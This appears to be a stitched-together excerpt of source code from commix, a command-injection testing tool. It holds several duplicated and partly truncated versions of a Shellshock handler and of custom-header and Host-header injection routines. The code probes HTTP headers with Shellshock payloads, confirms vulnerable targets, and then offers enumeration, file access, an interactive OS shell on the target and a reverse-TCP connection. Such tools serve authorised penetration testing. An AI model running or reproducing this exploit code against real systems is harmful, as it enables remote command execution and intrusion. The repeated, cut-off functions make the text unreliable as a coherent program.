        # A hit echoes "<cve>:Done" back; the CVE id is then looked for in the
        # response headers (``response.info()``).
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)
        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)
        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        response = urllib2.urlopen(request)
        if not menu.options.verbose:
          # Python 2 integer division: ``percent`` only reaches 100 on the
          # last probe; ``float_percent`` carries the fractional progress.
          percent = ((i*100)/total)
          float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
          if percent == 100:
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          elif cve in response.info():
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          else:
            percent = str(float_percent )+"%"
          sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
          sys.stdout.flush()
        # Print the findings to log file.
        if export_injection_info == False:
          export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
        if vp_flag == True:
          vuln_parameter = "HTTP Header"
          vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
        logs.update_payload(filename, counter, payload)
        if cve in response.info():
          no_result = False
          print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
          print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
          print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
          # Enumeration options.
          if settings.ENUMERATION_DONE == True :
            # Already enumerated once: ask before doing it again.
            print ""
            while True:
              enumerate_again = raw_input("(?) Do you want to enumerate again? [Y/n/q] > ").lower()
              if enumerate_again in settings.CHOISE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOISE_NO:
                break
              elif enumerate_again in settings.CHOISE_QUIT:
                sys.exit(0)
              else:
                if enumerate_again == "":
                  enumerate_again = "enter"
                print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
                pass
          else:
            enumeration(url, cve, check_header, filename)
          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
              if file_access_again in settings.CHOISE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOISE_NO:
                break
              elif file_access_again in settings.CHOISE_QUIT:
                sys.exit(0)
              else:
                if file_access_again == "":
                  file_access_again = "enter"
                print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
                pass
          else:
            file_access(url, cve, check_header, filename)
          if menu.options.os_cmd:
            # One-shot command from --os-cmd, then leave.
            cmd = menu.options.os_cmd
            shell = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            sys.exit(0)
          else:
            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                print ""
              gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                while True:
                  try:
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      # Built-in shell keywords are dispatched by checks.*.
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      if os_shell_option == False:
                        return False
                      elif os_shell_option == "quit":
                        sys.exit(0)
                      elif os_shell_option == "back":
                        go_back = True
                        break
                      elif os_shell_option == "os_shell":
                        print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
                      elif os_shell_option == "reverse_tcp":
                        # Set up LHOST / LPORT for The reverse TCP connection.
                        lhost, lport = reverse_tcp.configure_reverse_tcp()
                        while True:
                          if lhost and lport in settings.SHELL_OPTIONS:
                            result = checks.check_reverse_tcp_options(lhost)
                          else:
                            cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
                            result = checks.check_reverse_tcp_options(cmd)
                          if result != None:
                            if result == 0:
                              return False
                            elif result == 1 or result == 2:
                              go_back_again = True
                              break
                          # Command execution results.
                          shell = cmd_exec(url, cmd, cve, check_header, filename)
                          if menu.options.verbose:
                            print ""
                          # Reaching this point means the connection did not
                          # come back; the loop re-prompts.
                          print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
                      else:
                        pass
                    else:
                      shell = cmd_exec(url, cmd, cve, check_header, filename)
                      print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                  except KeyboardInterrupt:
                    raise
                  except SystemExit:
                    raise
                  except:
                    # Any other failure inside the prompt loop ends the run.
                    print ""
                    sys.exit(0)
              elif gotshell in settings.CHOISE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True
              elif gotshell in settings.CHOISE_QUIT:
                sys.exit(0)
              else:
                if gotshell == "":
                  gotshell = "enter"
                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                continue
              break
        else:
          continue
  except urllib2.HTTPError, err:
    if settings.IGNORE_ERR_MSG == False:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      continue_tests = checks.continue_tests(err)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
def shellshock_handler(url, http_request_method, filename):
  """Probe every header in ``headers`` with the test payload of every CVE in
  ``shellshock_cves`` and, on a hit, run the interactive follow-ups
  (enumeration, file access, a one-shot ``--os-cmd`` or the pseudo-terminal
  with readline tab completion when available).

  Args:
    url: target URL.
    http_request_method: accepted for interface parity; not read in this body.
    filename: log file handed to the ``logs.*`` helpers.

  Returns:
    ``False``/``True`` from the pseudo-terminal paths (``no_result`` decides
    which); otherwise the function falls off the end (``None``) or exits via
    ``sys.exit`` / ``SystemExit``.

  NOTE(review): the final ``except urllib2.HTTPError`` prints ``err_msg``,
  which is whatever message was last assigned inside the loop (or unbound if
  none was), not the caught exception ``err``.  ``counter`` is never
  incremented and ``go_back_again`` is never read.
  """
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "shellshock injection technique"
  info_msg = "Testing the " + technique + "... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        i = i + 1
        # A hit echoes "<cve>:Done" back; the CVE id is then looked for in the
        # response headers (``response.info()``).
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)
        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + settings.print_payload(payload))
        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        response = urllib2.urlopen(request)
        if not menu.options.verbose:
          # ``percent`` (Python 2 integer division) is only kept for the
          # non-final case; the progress text uses ``float_percent``.
          percent = ((i*100)/total)
          float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
          if str(float_percent) == "100.0":
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          elif cve in response.info():
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          else:
            percent = str(float_percent )+ "%"
          info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()
        # Print the findings to log file.
        if export_injection_info == False:
          export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
        if vp_flag == True:
          vuln_parameter = "HTTP Header"
          vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
        logs.update_payload(filename, counter, payload)
        if cve in response.info():
          no_result = False
          success_msg = "The (" + check_header + ") '" + Style.UNDERLINE
          success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "."
          print "\n" + settings.print_success_msg(success_msg)
          print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
          print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
          if not menu.options.verbose:
            print ""
          # Enumeration options.
          if settings.ENUMERATION_DONE == True :
            # Already enumerated once: ask before doing it again.
            if menu.options.verbose:
              print ""
            while True:
              question_msg = "Do you want to enumerate again? [Y/n/q] > "
              enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower()
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO:
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                if enumerate_again == "":
                  enumerate_again = "enter"
                err_msg = "'" + enumerate_again + "' is not a valid answer."
                print settings.print_error_msg(err_msg) + "\n"
                pass
          else:
            enumeration(url, cve, check_header, filename)
          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              question_msg = "Do you want to access files again? [Y/n/q] > "
              file_access_again = raw_input(settings.print_question_msg(question_msg)).lower()
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO:
                break
              elif file_access_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                if file_access_again == "":
                  file_access_again = "enter"
                err_msg = "'" + file_access_again + "' is not a valid answer."
                print settings.print_error_msg(err_msg) + "\n"
                pass
          else:
            file_access(url, cve, check_header, filename)
          if menu.options.os_cmd:
            # One-shot command from --os-cmd, then leave.
            cmd = menu.options.os_cmd
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            sys.exit(0)
          else:
            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                if menu.options.verbose:
                  print ""
              question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > "
              gotshell = raw_input(settings.print_question_msg(question_msg)).lower()
              if gotshell in settings.CHOICE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                if readline_error:
                  checks.no_readline_module()
                while True:
                  try:
                    # Tab compliter
                    if not readline_error:
                      readline.set_completer(menu.tab_completer)
                      # MacOSX tab compliter
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab compliter
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      # Built-in shell keywords are dispatched by checks.*.
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      if os_shell_option == False:
                        if no_result == True:
                          return False
                        else:
                          return True
                      elif os_shell_option == "quit":
                        sys.exit(0)
                      elif os_shell_option == "back":
                        go_back = True
                        break
                      elif os_shell_option == "os_shell":
                        warn_msg = "You are already into an 'os_shell' mode."
                        print settings.print_warning_msg(warn_msg)+ "\n"
                      elif os_shell_option == "reverse_tcp":
                        # Set up LHOST / LPORT for The reverse TCP connection.
                        reverse_tcp.configure_reverse_tcp()
                        while True:
                          if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
                            result = checks.check_reverse_tcp_options(settings.LHOST)
                          else:
                            cmd = reverse_tcp.reverse_tcp_options()
                            result = checks.check_reverse_tcp_options(cmd)
                          if result != None:
                            if result == 0:
                              return False
                            elif result == 1 or result == 2:
                              go_back_again = True
                              settings.REVERSE_TCP = False
                              break
                          # Command execution results.
                          shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                          if menu.options.verbose:
                            print ""
                          # Reaching this point means the connection did not
                          # come back; the loop re-prompts.
                          err_msg = "The reverse TCP connection to the target host has been failed!"
                          print settings.print_error_msg(err_msg)
                      else:
                        pass
                    else:
                      shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                      if shell != "":
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                      else:
                        if menu.options.verbose:
                          print "\n" + settings.print_payload(payload)
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print settings.print_error_msg(err_msg) + "\n"
                  except KeyboardInterrupt:
                    raise
                  except SystemExit:
                    raise
                  except:
                    # Any other failure inside the prompt loop ends the run.
                    print ""
                    sys.exit(0)
              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True
              elif gotshell in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                if gotshell == "":
                  gotshell = "enter"
                err_msg = "'" + gotshell + "' is not a valid answer."
                print settings.print_error_msg(err_msg) + "\n"
                continue
              break
        else:
          continue
  except urllib2.HTTPError, err:
    if settings.IGNORE_ERR_MSG == False:
      # NOTE(review): ``err_msg`` here is a stale loop-local, not ``err``.
      print "\n" + settings.print_error_msg(err_msg)
      continue_tests = checks.continue_tests(err)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
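def custom_header_injection(url, vuln_parameter, payload):
  """Send one probe request that carries *payload* in the custom HTTP header.

  The request is routed through the user-configured HTTP proxy, through
  Tor (Privoxy) or directly, depending on ``menu.options``.  The error
  handling for the three transports was identical, so it is shared below.

  Args:
    url: Target URL (for GET requests it is trimmed via
      ``parameters.get_url_part``).
    vuln_parameter: Passed through; not used by this function.
    payload: Header value to send; newlines are normalised first.

  Returns:
    When ``settings.TIME_RELATIVE_ATTACK`` is truthy, the elapsed wall-clock
    time of the request in whole seconds (``int``).  Otherwise the response
    object, ``False`` when the target answered with an HTTP error, or
    ``None`` when the request could not be opened (``ValueError``).

  Raises:
    SystemExit: on a connection-level failure (``URLError``) or when the
      user declines to continue after an HTTP error.
  """

  def inject_custom_header(url, vuln_parameter, payload, proxy):
    """Build the request, attach the probe header and open it.

    Returns the response object, or ``None`` when opening raises
    ``ValueError`` (kept from the original: the error is swallowed rather
    than propagated).
    """
    if proxy is None:
      opener = _urllib.request.build_opener()
    else:
      opener = _urllib.request.build_opener(proxy)
    # Check if defined POST data.
    # NOTE: this rewrites the shared menu.options.data, so every later
    # request of the session sees settings.USER_DEFINED_POST_DATA
    # (original behaviour, kept).
    if menu.options.data:
      menu.options.data = settings.USER_DEFINED_POST_DATA
      request = _urllib.request.Request(url, menu.options.data.encode(settings.UNICODE_ENCODING))
    else:
      url = parameters.get_url_part(url)
      request = _urllib.request.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    # A header value must stay on one line; newline_fixation is what keeps
    # the probe from being split into separate header fields.
    payload = checks.newline_fixation(payload)
    request.add_header(settings.CUSTOM_HEADER_NAME, payload)
    try:
      headers.check_http_traffic(request)
      return opener.open(request)
    except ValueError:
      return None

  def handle_http_error(err_msg):
    """Report an HTTPError the way each transport branch used to.

    A 500 is treated as a plain negative result.  Any other status is
    reported once (unless errors are being ignored) and the user is asked
    whether to continue; declining exits.  Returns ``False``, the value
    stored in ``response`` for every non-exiting path.
    """
    if str(err_msg.code) != settings.INTERNAL_SERVER_ERROR and settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      # Blank-line bookkeeping so the message does not land on a progress
      # line that may still be on the terminal (parenthesised for clarity;
      # same precedence as the original `not a and b or c and d`).
      if (not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False) or \
         (settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None):
        print("")
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print("")
      print(settings.print_critical_msg(err))
      if checks.continue_tests(err_msg) == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
    return False

  def handle_url_error(err_msg):
    """Report a connection-level failure and exit."""
    # The first two words of the reason are dropped (presumably an errno
    # prefix); a reason shorter than three words therefore prints just ".".
    reason = ' '.join(str(err_msg.reason).split(" ")[2:]) + "."
    if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
      print("")
    print(settings.print_critical_msg(reason))
    raise SystemExit()

  # Timing is always recorded; it is only returned for TIME_RELATIVE_ATTACK.
  start = time.time()
  # Pick the transport once; the request and error handling are the same
  # for all three.
  if menu.options.proxy:
    proxy = _urllib.request.ProxyHandler({settings.SCHEME : menu.options.proxy})
  elif menu.options.tor:
    proxy = _urllib.request.ProxyHandler({settings.SCHEME : settings.PRIVOXY_IP + ":" + settings.PRIVOXY_PORT})
  else:
    proxy = None
  try:
    response = inject_custom_header(url, vuln_parameter, payload, proxy)
  except _urllib.error.HTTPError as err_msg:
    # HTTPError is a URLError subclass: this clause must stay first.
    response = handle_http_error(err_msg)
  except _urllib.error.URLError as err_msg:
    handle_url_error(err_msg)
  if settings.TIME_RELATIVE_ATTACK:
    return int(time.time() - start)
  return response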
def custom_header_injection(url, vuln_parameter, payload):
  # Python 2 (urllib2) variant of the custom-header probe.
  # NOTE(review): this excerpt ends after the HTTP-proxy branch; the Tor /
  # direct branches and the TIME_RELATIVE_ATTACK return are not part of it,
  # so as written the function returns None after a successful proxied request.
  # `vuln_parameter` is passed through but not used here.
  def inject_custom_header(url, vuln_parameter, payload, proxy):
    # Build the request, attach the probe header and open it.  Returns the
    # response, or None when opening raises ValueError (swallowed below).
    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    # Check if defined POST data
    # NOTE: rewrites the shared menu.options.data for the rest of the run.
    if menu.options.data:
      menu.options.data = settings.USER_DEFINED_POST_DATA
      request = urllib2.Request(url, menu.options.data)
    else:
      url = parameters.get_url_part(url)
      request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    payload = urllib.unquote(payload)
    # Fix for %0a, %0d%0a separators: only a *leading* newline / CRLF is
    # re-quoted; any newline later in the (now fully unquoted) payload goes
    # into the header value as-is.
    if payload[:1] == "\n":
      payload = urllib.quote(payload[:1]) + payload[1:]
    elif payload[:2] == "\r\n":
      payload = urllib.quote(payload[:2]) + payload[2:]
    request.add_header(settings.CUSTOM_HEADER_NAME, payload)
    try:
      headers.check_http_traffic(request)
      response = opener.open(request)
      return response
    except ValueError:
      pass
  if settings.TIME_RELATIVE_ATTACK :
    # `start = 0` / `end = 0` are dead: start is overwritten right away and
    # end is not read in this excerpt.
    start = 0
    end = 0
    start = time.time()
  proxy = None
  #response = inject_custom_header(url, vuln_parameter, payload, proxy)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
      response = inject_custom_header(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err_msg:
      # A 500 is a plain negative result; other statuses are reported once
      # (unless errors are ignored) and the user decides whether to go on.
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        # Precedence: (not V>=1 and TIME_BASED_STATE == False) or
        #             (V>=1 and EVAL_BASED_STATE == None)
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
           settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print ""
        print settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err_msg:
      # Drops the first two words of the reason (presumably an errno prefix);
      # a reason shorter than three words leaves just ".".
      err_msg = str(err_msg.reason).split(" ")[2:]
      err_msg = ' '.join(err_msg)+ "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
def host_injection(url, vuln_parameter, payload):
  # Python 2 (urllib2) probe that sends the payload in the Host header,
  # prefixed with the target's own hostname.
  # NOTE(review): this excerpt ends after the HTTP-proxy branch; the Tor /
  # direct branches and the TIME_RELATIVE_ATTACK return are not part of it,
  # so as written the function returns None after a successful proxied request.
  # `vuln_parameter` is passed through but not used here.
  #
  # urlparse(url).hostname is None for a URL with no network location, in
  # which case this concatenation raises TypeError before any request is made.
  payload = urlparse.urlparse(url).hostname + payload
  def inject_host(url, vuln_parameter, payload, proxy):
    # Build the request, set the Host header and open it.  Returns the
    # response, or None when opening raises ValueError (swallowed below).
    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    # Check if defined POST data
    # NOTE: rewrites the shared menu.options.data for the rest of the run.
    if menu.options.data:
      menu.options.data = settings.USER_DEFINED_POST_DATA
      request = urllib2.Request(url, menu.options.data)
    else:
      url = parameters.get_url_part(url)
      request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    # Header values must stay on one line; newline_fixation normalises the
    # payload before it is used as the Host value.
    payload = checks.newline_fixation(payload)
    request.add_header('Host', payload)
    try:
      headers.check_http_traffic(request)
      response = opener.open(request)
      return response
    except ValueError:
      pass
  if settings.TIME_RELATIVE_ATTACK :
    # `start = 0` / `end = 0` are dead: start is overwritten right away and
    # end is not read in this excerpt.
    start = 0
    end = 0
    start = time.time()
  proxy = None
  #response = inject_host(url, vuln_parameter, payload, proxy)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.SCHEME : menu.options.proxy})
      response = inject_host(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err_msg:
      # A 500 is a plain negative result; other statuses are reported once
      # (unless errors are ignored) and the user decides whether to go on.
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        # Precedence: (not V>=1 and TIME_BASED_STATE == False) or
        #             (V>=1 and EVAL_BASED_STATE == None)
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
           settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print ""
        print settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err_msg:
      # Drops the first two words of the reason (presumably an errno prefix);
      # a reason shorter than three words leaves just ".".
      err_msg = str(err_msg.reason).split(" ")[2:]
      err_msg = ' '.join(err_msg)+ "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
def shellshock_handler(url, http_request_method, filename):
  # Oldest (Python 2) variant.  Probes each header in `headers` with every
  # CVE payload from `shellshock_payloads`; a finding is a response whose
  # headers contain the "<cve>:Done" marker.  Findings are logged and then
  # handed to the enumeration / file-access / pseudo-terminal flows.
  # Returns False (nothing found) or True (user backed out of a finding);
  # quit paths use sys.exit / SystemExit.  `http_request_method` is accepted
  # but not used in this version.
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "shellshock injection technique"
  sys.stdout.write("(*) Testing the " + technique + "... ")
  sys.stdout.flush()
  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        i = i + 1
        # "<cve>:Done" is the marker the detection below looks for.
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)
        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)
        header = {check_header: payload}
        request = urllib2.Request(url, None, header)
        # Direct request with urllib2 defaults: no timeout argument (the
        # global socket default applies) and no proxy / Tor routing.
        response = urllib2.urlopen(request)
        if not menu.options.verbose:
          # Progress label only.  The "100.0" branch is taken before the
          # marker check, so the last probe's label reflects earlier results;
          # detection itself happens independently further down.
          percent = ((i * 100) / total)
          float_percent = "{0:.1f}".format(round(((i * 100) / (total * 1.0)), 2))
          if str(float_percent) == "100.0":
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          elif cve in response.info():
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          else:
            percent = str(float_percent) + "%"
          sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]")
          sys.stdout.flush()
        # Print the findings to log file.
        # NOTE: type/technique, parameter and payload are written for every
        # probe, not only for confirmed findings.
        if export_injection_info == False:
          export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
        if vp_flag == True:
          vuln_parameter = "HTTP Header"
          vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
        logs.update_payload(filename, counter, payload)
        if cve in response.info():
          no_result = False
          print Style.BRIGHT + "\n(!) The (" + check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." + Style.RESET_ALL
          print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
          print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
          if not menu.options.verbose:
            print ""
          # Enumeration options.
          if settings.ENUMERATION_DONE == True:
            if menu.options.verbose:
              print ""
            while True:
              enumerate_again = raw_input("(?) Do you want to enumerate again? [Y/n/q] > ").lower()
              if enumerate_again in settings.CHOISE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOISE_NO:
                break
              elif enumerate_again in settings.CHOISE_QUIT:
                sys.exit(0)
              else:
                if enumerate_again == "":
                  enumerate_again = "enter"
                print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
                pass
          else:
            enumeration(url, cve, check_header, filename)
          # File access options.
          if settings.FILE_ACCESS_DONE == True:
            while True:
              file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
              if file_access_again in settings.CHOISE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOISE_NO:
                break
              elif file_access_again in settings.CHOISE_QUIT:
                sys.exit(0)
              else:
                if file_access_again == "":
                  file_access_again = "enter"
                print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
                pass
          else:
            file_access(url, cve, check_header, filename)
          if menu.options.os_cmd:
            cmd = menu.options.os_cmd
            shell = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            sys.exit(0)
          else:
            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                if menu.options.verbose:
                  print ""
              gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                if readline_error:
                  checks.no_readline_module()
                while True:
                  try:
                    # Tab compliter
                    if not readline_error:
                      readline.set_completer(menu.tab_completer)
                      # MacOSX tab compliter
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab compliter
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      if os_shell_option == False:
                        if no_result == True:
                          return False
                        else:
                          return True
                      elif os_shell_option == "quit":
                        sys.exit(0)
                      elif os_shell_option == "back":
                        go_back = True
                        break
                      elif os_shell_option == "os_shell":
                        print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
                      elif os_shell_option == "reverse_tcp":
                        # Set up LHOST / LPORT for The reverse TCP connection.
